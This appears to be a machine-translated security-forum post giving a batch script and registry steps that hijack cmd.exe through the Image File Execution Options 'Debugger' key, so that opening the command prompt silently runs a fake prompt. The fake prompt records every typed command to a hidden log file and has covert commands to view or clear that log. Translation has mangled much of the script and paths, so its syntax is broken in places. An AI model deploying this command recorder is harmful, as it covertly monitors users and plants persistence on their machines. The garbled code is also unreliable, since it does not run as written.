Author: a11yesno
Source: evil baboons Information Security Team (www.eviloctal.com)
The change is not very good and barely usable.
Maybe we should have a little more fault-tolerant code ..
Install and save the code as cmd. bat. Place system32 and copy cmd.exe to cmd.gif.
Add Registry
HKEY_LOCAL_MACHINE/software/Microsoft/Windows NT/CurrentVersion/Image File Execution options/cmd.exe
String: Debugger
String content 2.16.gif/C cmd. bat
@ Echo off
Title % comspec %
Improved REM cmd Recorder version
Rem author superjj (probably a vest !)
Address of REM Original article: https://forum.eviloctal.com/read-htm-tid-13905-fpage-0-toread--page-2.html
Rem improved by allyesno (I am not a vest !)
The REM error-tolerant Code cannot be improved. You can add some details by yourself!
Setlocal enabledelayedexpansion
Echo Microsoft Windows XP [version 5.1.2600]
Echo (c) Copyright 1985-2001 Microsoft Corp.
Echo.
For/L % I in (0, 0, 0) Do (
Set/P strcmd = % Cd % ^>
If "! Strcmd! "=" Whoami "Echo allyesno & set strcmd =
If "! Strcmd! "=" Log "type repeated windir1_history.txt & set strcmd =
If "! Strcmd! "=" Logclear "del %windir%history.txt & set strcmd =
For/F "delims =" % I in ("! Strcmd! ") Do echo % I >>% windir=history.txt
! Strcmd!
Echo.
)